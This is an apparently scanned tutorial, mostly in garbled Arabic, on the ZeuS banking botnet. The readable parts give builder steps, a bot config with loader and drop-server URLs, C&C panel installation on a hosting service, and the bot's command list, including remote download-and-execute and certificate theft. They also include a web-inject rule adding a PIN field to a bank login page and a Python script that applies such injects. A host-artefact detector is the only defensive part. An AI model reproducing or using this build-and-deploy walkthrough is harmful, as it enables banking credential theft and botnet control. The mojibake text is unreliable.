- BOT CLIENT -> stat.php: the bot POSTs its statistics.
- ATTACKER -> 1. auth.php -> 2. config.php (MySQL login + admin login) -> 3. successful auth -> index.php.
- DATA LOGGING: index.php -> MySQL.php (connecting to DB) -> fetching the stats from the DB table after DB authentication -> displaying stats on the UI.
ZeuS Botnet

J^J s-lil&VI Jc- ^jlaiJ <ln^Jl LI jill tillj £a O^J '4_A*VI CjL^L^VI 4-^1 j-<J (j-aVI cJ^^ J cJ J 1 ^ ga^L&SI (J-^ ^ .oJ-lJ 

tAjjJaUJI <LM CjI jluJ! Jc .(jVI ^Jc- j& Ia^ lS&^I ^ jJJ^SI ^2 ^L^JI l_ .l^jajjoi 

<J£ £-<^ J 4-Aj^VI ^jUtj ^aL£3l (jl l^jLuj (j-a ^^jll "ZcilS" U^jO L>^ ^ ^ M1 * 1 ^ > «all CjVIj^jVI j <J-^I (J^*^ (J 1 ^ uj 

<L^)IaJ UL^jJall (j* 4 > ^ill dlLa jIslxJI 

J jVl ^atL<Jl J j& .6^ j^. djIjjiilLJl (j-a ^ j^. j t . UjuoJ Uj^^ *M na^all JJ jnj^Sl 6^)^.1 (j* ^J^slSI ^31 ^jJal jll j;iC. <j^ 

AjtlaS S^lc ^a^ij tilli (j-a Will j Jc CjIj jjj^)3I j\ 4\))\\\ CjLi^g^JI ^j* 4jtia3 C-jjou] Igil .(J^jO ^ J-**^ J^ <L^)Ia3l t > nun 

4_J^Ua>J| SjLjall £y± ^ (j -0 L - J ^J^^' V ^^JjoiaII ^-<ujjJ jjujj ^if^ ^ (J-*^^ 1 ^all 

, (jj^ 70 ^2^>^ (jc a! jjjoixJI 

http://www.darkreading.com/attacks-breaches/fbi-bust-another-z
victim-losses/d/d-id/1134475

^jjjjoixi jjc. ^Iaj] (J jll jAj^aII 6^)ijai ^jc ^-IjaVU ^ajuj j .SpyEyc Trojan ^ jj ja " i c5^>^^ ^ ^ ^Iac 

^jij dii^ ^ Jlxij dij jjjVI ijia ^u** ^ s jA-bUJI CjSjI! J Botnets j c> '^'j Zeus Botnet 
ajs ^IUa lS^*^ 5 •^f juj " Bot IVIaster -Jl ^ j K- * >1 c_ aLij^a j> j CjUg ^1*^ ^SaA Jc Ui <J£ lI*-^ 

Jid ^jl jikVI djUl^ ^ j^l^SI Jj2 ^^kiauJI qia j^l ^UjojU ^ujli jii^j ^il j^" Mai ware Honey nets ^ 6 ^ 
uf- ^jWc- > Zeus Bot > j^. j http : //www . malwareurl .com/ , http : //www . mal waredomainli s t . com 
. Web Browser-^ jt ^ > ^^ t c> ^ f^ 3 ^ & Command & Control Center -Jl u' c^*^ Http Botnet 

Spreading & Infection

j^a ^l^kl^U CjjJI 11a f jLj ,o>jjll ojalLl c> SjWc- cPU J j H/^/i /f/s'A: Malware < *^ > ^j Z^ws 1 Botnet -SI 

c5^l keystroke J^-^ lU^? ^j^i A:ey loggers -SI jl USa UUj L_alik^ J£aij key loggers -SI s Ujjsj 

.Form Grabbing Technique -SI ^jiill ^ ^ Zeus Botnet -SI ^^ki^JI ^jL 

til^jjj ^i^J ^i^L tsLl ilia jjsj HTML cj Uq^i Forms J ^l^t ^ ^cr^ -^^^ ^ Form Grabbing 
j JjJ^VI ^^J^ ^ j Password j username ^ Jjj^VI Jl Jj^^l ^jjj j ^jjj^VI 
j filed Name -SI j <J POST lU*j c^S U JaliiSb form grabber -SI U^j ^ cs^t ^ 5-^UJI aj^JI 

.http sniffing password=123456 j username=admin ^ filed value 

J <jLk J ^ j£i La J£ ( . ilai J Ajjjixk ^j£-<ua c ^jojLojI cJ^j ^jSr> a^Ixj j^i Zeus bot Sh^JI *^j^I 6 ^ J 
post -SI JUilojU ^ill gate.php l^Ul^l ^Lj fe^p webserver Jj cjUjkJI JLuo jl ^Lj ^jjjill 

CjIj^I a - ^aii jjj^)3I ojbjj ^UJ j^UI CjIj^VI <liiaJI ciA-i^ ^j;^ ^juiixJ jj ^^jI! CjIj^VI a j& Zeus 

L_aLi ^LauU ^ajolS l_a jjoJ Builder tool Sl^l .^-x-^j^^^l djLd jIslxJI ^jhvy^bjlujl j ^CjIj jjj^II l_ ua^j/Jc Jal q^SS jl ^nJaUli 

.ZeuS botnet (^^^^ ^-j^ ^1 ^^-^>^l (j -0 ^Uli cIajj jJI jl ^.1 j 
c > u>i^ (^^icj "moddcrs" cs-^ tcijUSlI l-a^UI ^jjla>» <JjS Jal jIxjuAj ^iJJ CjIj^VI a^. a ^ aJa*^

,^Uj 4j£l j a j-q ciJl!i3l jIaj^VI j ^A^jjudj L_a ^juj La !a& j <^-^ j J jVI jl-^^yi cs-*^ 

Building



^5 djUL 400 ^ ^ uj^ u' (_>axJ (jSaja 6 11a Jlo j±£ ^jj^ £f .Visual Studio ^ ^ jj^^ 

^jAsII jljUl ^^Jc SjlaJ 4ja3 (JjjjJJ .1-1^. AjAilflj WindoWS CUlls ^iAklajU C ++ ^ajuj^ ^ JJ J ^ U ^ 4JC^ ^ t^UijVl ^jUr> 



u^j^J c> ^1^1^ 'Microsoft Visual Studio c> uj^ u' 



^ill aL^I -Li^jj ^ cmd ^ Jj^-^W 'Microsoft Visual Studio vlO 4^ uj^ u' l>-j^ j 

.s jj^Uxi L_aLJI Iaa jiill J^Lk ^ jl ( jjj Wil l <jLc; ^aJ make Jullxmd >«VI <jjjjjJ CjUL l^j^ 



[Screenshot: source repository listing: make.cmd, make_debug.cmd, make_default.cmd, manual_en.html; commit messages "Sources uploaded." (4 years ago) and "Revert "encoding experiments"" (a year ago)]



til*]) Ji\ UiA^L di^V) f iJilyib tiUij vlO ^^Jl Microsoft Visual Studio p\¥un\ £l CjJj) lit ;4iajalA 
Microsoft Visual Studio ^ c^^l cfe^ maA:^ ^j^Jt buildconfig.inc.php 

// (garbled comment in the original)
$dir['vcdlls']          = 'C:\Program Files\Microsoft Visual Studio 10.0\Common7\IDE';
$dir['vc']              = 'C:\Program Files\Microsoft Visual Studio 10.0\VC';
$dir['sdk']             = 'C:\Program Files\Microsoft SDKs\Windows\v7.0';   // minor version digit unreadable in the scan
$dir['vcbin']['win32']  = $dir['vc'] . '\bin';
$dir['vcbin']['win64']  = $dir['vc'] . '\bin\amd64';
$dir['sdkbin']['win32'] = $dir['sdk'] . '\bin';
$dir['sdkbin']['win64'] = $dir['sdk'] . '\bin\x64';

Configuration and Bot Creation

iCJd jjjjIU Jl^iVI ^ cjjJI ( aUli Iaa jfkj diia. .Config < a!ac-I iiiiLl! JjUSI Cj jA\ < aL> ^Lb ^ J jVl S j^^ll

^A US 4(jJI ja. (> JjSSj Config "-ii- .<^J <^ J U*^?- cs^ 1 CjliUJ! (jc. CjU jkxi ^ 4j| USj

:^Vl£ Edit ciji jisll ^ Builder ^iil fS "zsb.exe" Vji *Mi7rfer ^ Config J>-»jll



[Screenshot: ZeuS Builder, Builder tab: Source configuration file C:\Users\samar\Desktop\ZS_2.0.8.9\builder\confi… with Browse... / Edit... buttons; actions "Build the bot configuration" and "Build the bot executable"]
.ILL* U j£i U£ jjjj ^ uj^ ^ ^ j Config j&^j edit j*^' ^



[Screenshot: config.txt opened in Notepad inside a Windows 8 VirtualBox VM]

;Build time: 04:00:05 03.11.2014 GMT
;Version: 2.0.8.9

entry "StaticConfig"
  ;botnet "btn1"
  timer_config 60 1
  timer_logs 1 1
  timer_stats 20 1
  url_config "http://localhost/config.bin"
  remove_certs 1
  disable_tcpserver 0
  encryption_key "secret key"
end

entry "DynamicConfig"
  url_loader "http://localhost/bot.exe"
  url_server "http://localhost/gate.php"
  file_webinjects "webinjects.txt"

  entry "AdvancedConfigs"
    ;"http://advdomain/cfg1.bin"
  end

  entry "WebFilters"
    "!*.microsoft.com/*"
    "!http://*myspace.com*"
    "https://www.gruposantander.es/*"
    "!http://*odnoklassniki.ru/*"
    "!http://vkontakte.ru/*"
    "@*/login.osmp.ru/*"
    "@*/atl.osmp.ru/*"
  end

[remainder of the file not visible in the screenshot]



1. Static Configuration

bMk'y\ ^aJJ LgAjC d jA\ \ g ^>H^J L_fl jjoj dLi jlx-<Jl Jc <_£jJ^J 4il .e-LuuVl Sbl <Jajoj| jJ d jjll ^fl StaticConfig dUlax^ *U^.JJ ^aJJ 

,^j^JI d jJ! 4_kjaij (Jj^^j] d jA\ j-ajj (jl * . StaticConfig L '"\i w *^ JjV 



d jj b* ^311 dii jJl "botnet" 

.dynamic configuration L^yz c& "timer_config" 
JIjjVI ^UJ ^L^VI dU jkJ! jA^jSjA\ d^J! dUL jjj ^ jll J^lill "timer_stats" j "timerjogs" 
Black Energy botnet J ^M-^ ^ ^ ( Lu^ l ^UJ3 URL u' "url_config" 

, "dynamic configuration" J^- ^jJi 

ji jj jl^a. jj jl£ b] U ^j^j] ^UJI ip q\ ^ <ul*j d jA\ dii^ URL ul j^- "url_compip" 

url_compip "http://localhost/web/ip.php" 1024 ^ c> /U^aJI
.dtj jjjjJI (J^b <Lojj-<JI dL* jlx-<Jl ^ILkV ^Aadujj ^ill jjLjSjI! ^-UL* "encryption key" 

2. Dynamic Configuration

<j jS^d dljiia ^glc L-fllxJI 11a iJaa^j ^jj - < r i^jja3l jj jjj^ ^ Jc Asu d jJI JjS DynamicConfig cJj^*^ ^ 

.tdlij ^Ijiil ^Uacj ^j* lil t^joiij ^ ^^j^. mj Jj^^'^ di jJl (j^j URL "url loader" 
.l^iij^j j dliLJI j dWL^a^VI j d!l^uaJI "drop server" JalS^VI ^^UJ URL u' "url_server" 

jj* jjj-<^3I jl^j> l^Jj j^ajj c _^j3I dLaij^a AjflLjaj J jSa. ^jSa. J ^AklauJI dLd jlx-<J! "file webinjects" 

.build the bot configuration Jj^ j^W Config ^t^t (> ftfc^VI ^ 

Building the Bot

^jIj VjI . ^jaMtt (Jjiili d jj3I t *aUj jiJUj ^ jj^JI Config t a ^ ^^-M ^^Jl sbl ^l^kiujl ^jj j^lj>. Config t uj-^ ^j^^ 
jUiJI ^AklauJI ^ kxj 6^ j bli V ^jl (Jjjjj j d jj dujjj ^j bj Ui AijsLxJ aJc jjj*^ u^^^J Zeus builder 

;^aUaj3l ^jc dLd jIslxJU jjjsj ^ kxj L_A jjoj Builder .Config dbl^c] jUlkV lS^^ <LcaJ j jj^aLJ! b^ Lajj .^Uajll c qjhvil 
[Screenshot: ZeuS Builder, Information tab. Current version: Version 2.0.8.9, Build time 04:00:05 03.11.2014 GMT, Signature "warrior buy source". Information about active bot: Encryption key field, Information: "Bot not founded.", Remove bot button]

.cjjJI cjUL <> JLl ^U^3I q\ ls ±u Bot not founded Jia.5U 
<y*^ "build the bot configuration" jjll <ija jfcll '"Zeus builder" ^l^ki^U 

.DynamicConfig dj jJ3 c ^jja^H ^£1*11 Ig/mJa j t aLill 11a L*.ijc- , jLSuJI <S£Jj 




[Screenshot: ZeuS Builder after "Build the bot configuration": the log pane lists the numbered target URL masks from the web-inject file (online banking and payment sites) and ends with BUILD SUCCEEDED!]



<jL^i^U Jl^JI cj jA\ c^L *l£L ^ jib if&xl] jli < "build the bot executable" jj cf- 

\ 4_xaL^^j Jjllsu ^JJ PE L_flLJl m A alia a JJQ udJ £A <LUalL<» <J llfljj dj ClAiLa (JA JaxjJall (j^J 

.dl jJI ^.Uj ^aJ (jl Asu ^.uilftll 4_Iajail 4_jJa jjsuol] dlLa jIslaII ^jJa jJ filial Sjjj^ll .^J^ 



[Screenshot: ZeuS Builder after "Build the bot executable", log pane:]
Building the bot...
Loading configuration...
botnet=
timer_config=60min, 1min
timer_logs=1min, 1min
timer_stats=20min, 1min
url_config=http://localhost/config.bin
remove_certs=1
disable_tcpserver=0
encryption_key=OK!
Creating executable file...
Size of output file is 170500 bytes.
BUILD SUCCEEDED!
Bot Distribution and Installation
"spam campaign" ^jjJI ^l >ikU dVUJI J m( j j^Vl jj j^SII * J] jl^VI s j^3! <jJ (jjJ ojjj j 

J UL^jJall ^(.iaJ £tC j/Jl ^^>JI 4_lLaij (J^lj 4_icLd^.Vl <jujA1^JI ^ jj ~ laJLujJj .-lajlj jl (J^J-a L_aL» (Jjjia (jc Lai tdV II 

4 i o HfrU Jj^ uJJ^I L-J3U aJj 4 - Va a ^-iUull J LJl6j 'lS^^ (j-G AjljujIj ^ L£ ujJ d>^ uj Jflj m Cj jA\ >jq'^ 

.<£jJjuuJ| (JjjjJ j ^I^JjujU cillij <j^aL^JI dtj* jjjjll j (JjljL^J ,j| j£Vl (j-a a a>JJJ j& A jcl al^Vl 

,dlj jjjjII a£jjou (JU^j^U j 6<joiij o^j^ j i— ujjj] dl jjn^ll ^j-xi J^c <j!^Lk ^j-d 4-^^ Ajp* > ^1 jj jjax^II Jc- d jJl Aiajj 

dl jjn^ll ^^Jfc filial Sjj^AxJ! ,6^J^JI CIjIjIAj^VI J lA JJJJU ^JJ UU^I J 6(jVI lg <OViun <jkjudi3l J ^^Jfc LiA jll dULJl S-Ldjoll 

;"Ja£a ^Jt >i Jjll" dLj jJjjll A£jjoU AJL^jI ^aJ (j-G j 4_I^jJa3l ^aUaj Jc 4 LlA^J ^aJJ LdAjc d jill lAAkjJ 

1- The install function searches for the "winlogon.exe" process, allocates some memory within it and decrypts itself into the process.

2- The bot executable is written to the hard drive as "C:\WINDOWS\system32\sdra64.exe".

3- The directory "C:\WINDOWS\system32\lowsec\" is created. This directory is not visible in Windows Explorer but can be seen from the command line. Its purpose is to contain the following files:

■ local.ds: Contains the most recently downloaded DynamicConfig file.
■ user.ds: Contains logged information.
■ user.ds.lll: Temporarily created if transmission of logs to the drop server fails.

4- The Winlogon ("HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon") registry key's value is appended with the path of the bot executable: C:\WINDOWS\system32\sdra64.exe. This will cause the bot to execute when the computer restarts.

5- The Windows XP firewall is disabled. This causes a Windows Security Center warning icon to appear in the system tray, the only visible indication that the computer has been infected.

6- The bot broadcasts an "M-SEARCH" command to find UPnP network devices. This may be an attempt to access and reconfigure local routers.

7- The bot sends an HTTP GET command to the configured botnet server to get the latest DynamicConfig file.

8- The bot begins capturing and logging information from the infected computer. The DynamicConfig file largely determines what information is collected.

9- The bot sends two HTTP POST commands to upload log (user.ds) and stat information to the botnet drop server.

10- Three timers are set to values in the StaticConfig, each executing a function on time-out:
o Get new config file (DynamicConfig) from server (default 60 minutes),
o Post harvested data (user.ds) to server (default 1 minute),
o Post statistics to server (default 20 minutes).

11- If a web page that is viewed from the infected computer is on the injection target list in the DynamicConfig, the additional fields from the list are injected into the page.

12- If the HTTP "200 OK" reply to a POST contains a hidden script command, the bot executes it and returns a success or failure indication along with any data.
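The artefacts named in steps 2 to 5 are what a responder checks for on a suspect host. The following is an added example, not code from this document or from ZeuS: it evaluates a constructed host snapshot against those indicators and assumes that the Winlogon value the text refers to is Userinit.

```python
"""Host-artefact check for the ZeuS installation steps listed above.

Added example (not the document's or ZeuS's code). It evaluates a snapshot
of host data handed to it, so it runs offline; collecting that data from a
live Windows machine is the caller's job. It assumes the Winlogon value the
text refers to is Userinit, and every sample snapshot below is constructed.
"""
from dataclasses import dataclass
from typing import List, Set

SYSTEM32 = r"C:\WINDOWS\system32"
BOT_EXE = SYSTEM32 + r"\sdra64.exe"           # step 2
LOWSEC_DIR = SYSTEM32 + r"\lowsec"            # step 3
LOWSEC_FILES = ("local.ds", "user.ds", "user.ds.lll")
STOCK_USERINIT = r"\userinit.exe"             # the only legitimate Userinit entry on a clean XP host


@dataclass
class HostSnapshot:
    paths: Set[str]          # files and directories present under system32
    userinit: str            # HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
    firewall_enabled: bool   # Windows XP firewall state (step 5)


@dataclass
class Finding:
    step: int     # installation step the indicator belongs to
    detail: str


def userinit_extras(value: str) -> List[str]:
    """Entries in the comma-separated Userinit value other than userinit.exe (step 4)."""
    entries = [e.strip() for e in value.split(",") if e.strip()]
    return [e for e in entries if not e.lower().endswith(STOCK_USERINIT)]


def check_zeus_indicators(snap: HostSnapshot) -> List[Finding]:
    present = {p.lower() for p in snap.paths}
    findings: List[Finding] = []
    if BOT_EXE.lower() in present:
        findings.append(Finding(2, "bot executable on disk: " + BOT_EXE))
    if LOWSEC_DIR.lower() in present:
        findings.append(Finding(3, "lowsec directory present: " + LOWSEC_DIR))
    for name in LOWSEC_FILES:
        if (LOWSEC_DIR + "\\" + name).lower() in present:
            findings.append(Finding(3, "lowsec data file present: " + name))
    for extra in userinit_extras(snap.userinit):
        findings.append(Finding(4, "extra Userinit entry (persistence): " + extra))
    if not snap.firewall_enabled:
        findings.append(Finding(5, "Windows firewall disabled"))
    return findings


def verdict(findings: List[Finding]) -> str:
    """'infected' needs a file or persistence indicator; a disabled firewall alone is only 'suspicious'."""
    steps = {f.step for f in findings}
    if steps & {2, 3, 4}:
        return "infected"
    return "suspicious" if steps else "clean"


# Constructed snapshots: a clean XP host and one showing the artefacts from steps 2-5.
CLEAN = HostSnapshot(
    paths={SYSTEM32 + r"\userinit.exe"},
    userinit=SYSTEM32 + r"\userinit.exe,",
    firewall_enabled=True,
)
INFECTED = HostSnapshot(
    paths={SYSTEM32 + r"\userinit.exe", BOT_EXE, LOWSEC_DIR,
           LOWSEC_DIR + r"\local.ds", LOWSEC_DIR + r"\user.ds"},
    userinit=SYSTEM32 + r"\userinit.exe," + BOT_EXE + ",",
    firewall_enabled=False,
)

if __name__ == "__main__":
    for label, snap in (("clean", CLEAN), ("infected", INFECTED)):
        found = check_zeus_indicators(snap)
        print(label, "->", verdict(found))
        for f in found:
            print("  step %d: %s" % (f.step, f.detail))
```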

Botnet Command and Control

Control Panel Installation 

A <Jala <Ljoj j J^jJ Lg£ ,d jA\ ^ > ^i^l £cxali^)J! j-g! jl JLujjIj A-ilc Sjj-ijuill j d jA\ 3JL^. Lt.nLt.nl (JJJJJJ f>^Vl A^. jJ (JJJ^ ^Vlmj 

Aj\ JJ jjjfl^l 6 j&-^l d jA\ <Jj3 (J-g <^ ^aJ dLa jIslaII <J jj^ jll j q^jxI 

4-uIa ^jSli^ 
\ g aI^-w a j tA-iSLjaVI £c^l^)Jl (J^axJ .^^juuIjI j\ JJS Jc- Ifrl^ nil (j^J jAx^aH j^Lg PHP (JJJ^ 1 * J* f^V^l 4-^ jl

Control ^3^^ ^-^^ uj^ ,<i>.»Ij.a1I cAijiV! MySQL - iklm* Liajl l_±^j .Uiaj) ^^Ujj J ^ ia A\ 

l$\ ^ lit .^pa^xlauiH ^j-<i l^J] J jll (j^j 4 ^ ciujjj t^lli Asu ^L-jjjll ^jIa a Jl mj (j^j Panel code 

■ http://www.hostinger.ae AiLja^Yl ^^ki^j lJj^ li* J -1 

ijYtS MySQL £AjLj $^15 *L&b pjfc -2 



[Screenshot: Hostinger control panel at cpanel.hostinger.ae, MySQL section with the MySQL databases and phpMyAdmin entries]

/Ul3il 4^Li3l Jinj l^j . MySQL ^) jS Jja ji^L ^ -3 



[Screenshot: Hostinger MySQL database creation page; a database and user named u228731182_jana are created]
.I^jL&I ^1 CjUUJI S^clS .k^U L^lilk ^ ^Ij ^Vl^ AJL!^\ JjjS jiill Aju -5



[Screenshot: MySQL database details (host mysql.hostinger.ae, database and user u228731182_jana, phpMyAdmin link) and the "Assign privileges" list: CREATE, CREATE TEMPORARY TABLES, INSERT, REFERENCES, SHOW VIEW, UPDATE, ALTER, CREATE ROUTINE, CREATE VIEW, DROP, INDEX, LOCK TABLES, SELECT, TRIGGER]

Uki U£ ^UJI <kaaJ zip 41* ^ server[php] ^V^l .ki^ ^ jIjj Zeus ls ls^ s^ij -8 

.Chmod i> <r 4-^»UJI CjU^^JI j^j system ^V*^ 777 global.php ^ -9 

Jlld install ^ UUxij c ^j3I jajjjaJL <j^aLkH CjULJI C5 1c <_£ill a\\ ^ AjL^jh li*a ^ill L_fljjJaxJI ^1 t . c^Ui a*j -10 
: ^JU3I J\ c_jUi3! ; http://jana2.byethost7.com/server[php]/install :c r 5 ^



[Screenshot: Control Panel install page at jana2.byethost7.com/server[php]/install/: "This application install and configure your control panel on this server. Please type settings and press 'Install'." Fields: User name (1-20 chars): admin, Password (6-64 chars), Host: 127.0.0.1, User: root, Password, Online bot timeout, Encryption key (1-255 chars), checkboxes Enable write reports to database / Enable write reports to local path]
.install c3j^ f I^jIjouI ^^jI! CjULJI S^otaj I g j; ^ j^j ^jujLoJ! J^-^- (j-* -11



[Screenshot: Control Panel 2.0.8.9 Install page filled in: User name admin, Password 12345678, Host mysql.hostinger.ae, User (the database user created above), Database cpdb, Online bot timeout 25, Encryption key hello; "Enable write reports to database" and "Enable write reports to local path" checked]



jI^cVI ^Ui Jc- JjjI ^LJUll 2LiUill j^ki Install J*- ^ 



[Screenshot: installer output:]
* Connecting to MySQL as 'root'.
* Selecting DB 'cpdb'.
* Updating table 'botnet_list'.
* Creating table 'botnet_reports'.
* Creating table 'ipv4toc'.
* Filling table 'ipv4toc'.
* Updating table 'cp_users'.
* Updating table 'botnet_scripts'.
* Updating table 'botnet_scripts_stat'.
* Creating folder '_reports'.
* Writing config file.
-- Update complete! --



Botnet Administration 

"http://jana2.byethost7.com/server[php]/cp.php" ^ cp.php ^ c> f£a3l! J) ±*j



[Screenshot: CP :: Summary statistics. Current user: admin, GMT date: 03.11.2014, GMT time: 11:26:47. Menu: Summary, OS; Botnet: Bots, Scripts, Reports, Search in database, Search in files, Jabber notifier; System: Information, Options, User, Users. Information: Total reports in database 0, Time of first activity (empty), Total bots 0, Total active bots in 24 hours 0% - 0, Minimal version of bot 0.0.0.0, Maximal version of bot 0.0.0.0; current botnet: -- Empty --; button Reset "New bots"]
J\ "NAT <J^b" e ^kio^ ^ ."filter" ^ yi lP 3 ^ g?^ <"Bots" j* >^ .

.^UlA^U Sjtfl jSSVl ^ jA\ a^^'W ^ cilli Jj Uj <"J^1« j^" ji "jjV oJ" <"NAT £ j^" 



[Screenshot: CP Bots page. Filter fields: Bots, Botnets, IP-addresses, Countries, NAT status, Online status, Install status, Used status, Comments status; "Bots action: Full information". The table lists five bots in botnet "plag" (bot IDs beginning vb4…, private 192.168.x.x addresses, version 2.x), one commented "good one" and one "new config"]



ojLudjj L_fl^x-o j& "Bot ID" j 3 j^l Cja cJ^ l! A-jjujLujVi cjL* jlx-<JI (j^asu ^jia^su c _^j3!j ^LajIs ^jia^xja "accept" (Jj^ 

.^^klaiJI Jjs l^jflUiaj dbdj ^1 djllilsu ^1 "Comments" UjUtS 
11 Full information 1 J^JI lW^ J j^aaJ I ji^j ^1 ^j^II i> lP 3 *^ ^li u ii ^ l 4-ajU3I ":Bots action" 

^a^klaij j ^.^ImJ <Jj£ ^ Ia^I^C-I ^aJ ^jJl Ajj^aill £C*lji3l (j* 4_AjUi (jla^su ^ill j '"scripts" ^^HJ^ <xjU1I ^ JJ^aixJl 

,CJ jJI 4_ix»jJaxJl J-aljVI (j-a jl ^-Ij cJ^jV a J L ^11 £cxil^)j3l 



[Screenshot: CP Scripts page. Action: Enable / Disable / Delete. Table of scripts named script_125… (one "Copy of script_1254251770"), each with status Enabled or Disabled, a creation date and time in September 2009, a send limit and execution counters]



jjjIIluJ! ^-^ajj -yH^ J jj^ 3 * . 1 J" 1 J ^ ^ ^j^Jt ^UjujVI jl "Add New Script" 

^UjJI j^lji (> jSSl jl JLkjj jSaj context ci^^ .location based services (LBS) cjU^J ^ 11a .SjjSUI 



[Screenshot: CP Add New Script form: Status (Enabled), Limit of sends, List of bots, List of botnets, List of countries, Context (example shown: getfile c:\autorun.inf), "Create script from" selector, Bots action]
Available commands:

reboot                          Reboot computer.
kos                             Kill OS.
shutdown                        Shutdown computer.
bc_add [service] [ip] [port]    Add back connect for [service] using server with address [ip]:[port].
bc_del [service] [ip] [port]    Remove backconnect for [service] (mask is allowed) that use connection to [ip]:[port] (mask is allowed).
block_url [url]                 Disable access to [url] (mask is allowed).
unblock_url [url]               Enable access to [url] (mask is allowed).
block_fake [url]                Disable executing of HTTP-fake/inject with mask [url] (mask is allowed).
unblock_fake [url]              Enable executing of HTTP-fake/inject with mask [url] (mask is allowed).
rexec [url] [args]              Download and execute the file [url] with the arguments [args] (optional).
rexeci [url] [args]             Download and execute the file [url] with the arguments [args] (optional) using interactive user.
lexec [file] [args]             Execute the local file [file] with the arguments [args] (optional).
lexeci [file] [args]            Execute the local file [file] with the arguments [args] (optional) using interactive user.
addsf [file_mask...]            Add file masks [file_mask] for local search.
delsf [file_mask...]            Remove file masks [file_mask] from local search.
getfile [path]                  Upload file or folder [path] to server.
getcerts                        Upload certificates from all stores to server.
resetgrab                       Upload to server the information from the protected storage, cookies, etc.
upcfg [url]                     Update configuration file from url [url] (optional, by default used standard url).
rename_bot [name]               Rename bot to [name].
getmff                          Upload Macromedia Flash files to server.
delmff                          Remove Macromedia Flash files.
sethomepage [url]               Set homepage [url] for Internet Explorer.


The following is an example of how the bot alters a web page.

Web Page Injection

The entry below is a web-inject rule from a Zeus configuration file. It adds a PIN field to a bank's login page:

set_url http://www.bank.com/login.html GP
data_before
name="password"*</tr>
data_end
data_inject
<tr><td>PIN:</td><td><input type="text" name="pinnumber" id="pinnumber" /></td></tr>
data_end
data_after
data_end

set_url names the target page and the request methods the rule applies to (G for GET, P for POST). data_before is the mask the bot searches for in the server's response; the asterisk is a wildcard, so the mask matches from the password input up to the closing </tr> of its table row. data_inject is the HTML the bot inserts right after that match; data_after marks the end of the replaced region and is empty here, so nothing from the original page is removed. The rewrite happens inside the victim's browser, so the injected field appears on the bank's genuine page at the bank's genuine address.



[Screenshot: "Test Login - Microsoft Internet Explorer" at http://www.bank.com/login.html, shown twice: before injection (Username, Password, Submit) and after injection (Username, Password, PIN, Submit).]



The page as served by the bank, before the bot modifies it, contains the following HTML; the data_before mask matches the password row:

<TR>
<TD>Username:</TD>
<TD><INPUT id=username name=username></TD></TR>
<TR>
<TD>Password:</TD>
<TD><INPUT type=password name=password></TD></TR>
<TR>
<TD colSpan=2><INPUT type=submit value=Submit></TD></TR>

And this is the HTML after the bot has inserted the data_inject block; the added PIN row is the only change:

<TR>
<TD>Username:</TD>
<TD><INPUT id=username name=username></TD></TR>
<TR>
<TD>Password:</TD>
<TD><INPUT type=password name=password></TD></TR>
<TR>
<TD>PIN:</TD>
<TD><INPUT id=pinnumber name=pinnumber></TD></TR>
<TR>
<TD colSpan=2><INPUT type=submit value=Submit></TD></TR>
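As an added example (this is illustration code written for this page, not code from the Zeus kit), the script below parses the web-inject entry above and applies it to the bank page the way the bot does inside the browser: it matches data_before, inserts data_inject and drops anything up to data_after. The config text and the page HTML are embedded as constructed samples (quoted attributes added); matching masks case-insensitively is an assumption of this example.

```python
import re

# Constructed sample: the web-inject entry from the text, as it appears in a Zeus config.
SAMPLE_INJECTS = """\
set_url http://www.bank.com/login.html GP
data_before
name="password"*</tr>
data_end
data_inject
<tr><td>PIN:</td><td><input type="text" name="pinnumber" id="pinnumber" /></td></tr>
data_end
data_after
data_end
"""

# Constructed sample: the login page as the bank serves it (quoted attributes assumed).
SAMPLE_PAGE = """\
<TR><TD>Username:</TD><TD><INPUT id="username" name="username"></TD></TR>
<TR><TD>Password:</TD><TD><INPUT type="password" name="password"></TD></TR>
<TR><TD colSpan="2"><INPUT type="submit" value="Submit"></TD></TR>
"""


def parse_webinjects(text):
    """Parse set_url / data_before / data_inject / data_after ... data_end blocks.

    Returns a list of rules: {"url", "flags", "before", "inject", "after"}.
    """
    rules, current, section, buf = [], None, None, []
    for line in text.splitlines():
        word = line.strip()
        if word.startswith("set_url "):
            parts = word.split()
            current = {"url": parts[1], "flags": parts[2] if len(parts) > 2 else "GP",
                       "before": "", "inject": "", "after": ""}
            rules.append(current)
        elif section is None and word in ("data_before", "data_inject", "data_after"):
            section, buf = word[len("data_"):], []
        elif word == "data_end" and section is not None:
            if current is not None:
                current[section] = "\n".join(buf)
            section = None
        elif section is not None:
            buf.append(line)
    return rules


def mask_to_regex(mask):
    """Zeus masks: '*' matches anything, every other character is literal."""
    return ".*?".join(re.escape(part) for part in mask.split("*"))


def rule_applies(rule, url, method):
    """G in the flags means GET requests, P means POST requests."""
    return method[:1].upper() in rule["flags"] and \
        re.fullmatch(mask_to_regex(rule["url"]), url) is not None


def apply_inject(html, rule):
    """Insert data_inject after the data_before match; when data_after is
    non-empty, the text between the two masks is replaced, as the bot does."""
    flags = re.S | re.I  # assumption: masks are matched case-insensitively
    m = re.search(mask_to_regex(rule["before"]), html, flags)
    if not m:
        return html  # anchor not present: page passes through unmodified
    start = end = m.end()
    if rule["after"]:
        a = re.search(mask_to_regex(rule["after"]), html[end:], flags)
        if not a:
            return html
        end += a.start()
    return html[:start] + rule["inject"] + html[end:]


def rewrite_response(url, method, html, rules):
    """What the bot does to every HTTP response the browser receives."""
    for rule in rules:
        if rule_applies(rule, url, method):
            html = apply_inject(html, rule)
    return html


def demo(url="http://www.bank.com/login.html", method="GET"):
    return rewrite_response(url, method, SAMPLE_PAGE, parse_webinjects(SAMPLE_INJECTS))


if __name__ == "__main__":
    print(demo())
```

Running it prints the page with the PIN row placed after the password row, exactly as the screenshots above show; requesting a URL with no matching set_url, or with a method not listed in the flags, returns the page untouched.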

A Config file, on top of the default settings, commonly carries web injects of this kind for more than 100 target addresses, each bank with its own injection block.

Citadel Zeus botnet

Citadel is a crimeware kit derived from the leaked Zeus source. It keeps the "web inject" mechanism and ships with its own control panel and builder, shown below.



[Screenshot: Citadel Control Panel 1.3.4.5 installer (fields: user name, password, online bot timeout, encryption key, "Enable write reports to database", "Enable write reports to local path", Install button) and the Citadel Builder, "Universal Spyware System" (build time 22:23:30 30.09.2012 GMT, login key, source configuration file, language English, buttons "Build the bot" and "Build the config"; the build log lists settings such as package_max_size = 51200 bytes, use_module_video = 1 and encryption key = OK, then "Creating executable file...").]



GameOver Zeus botnet (GOZ)

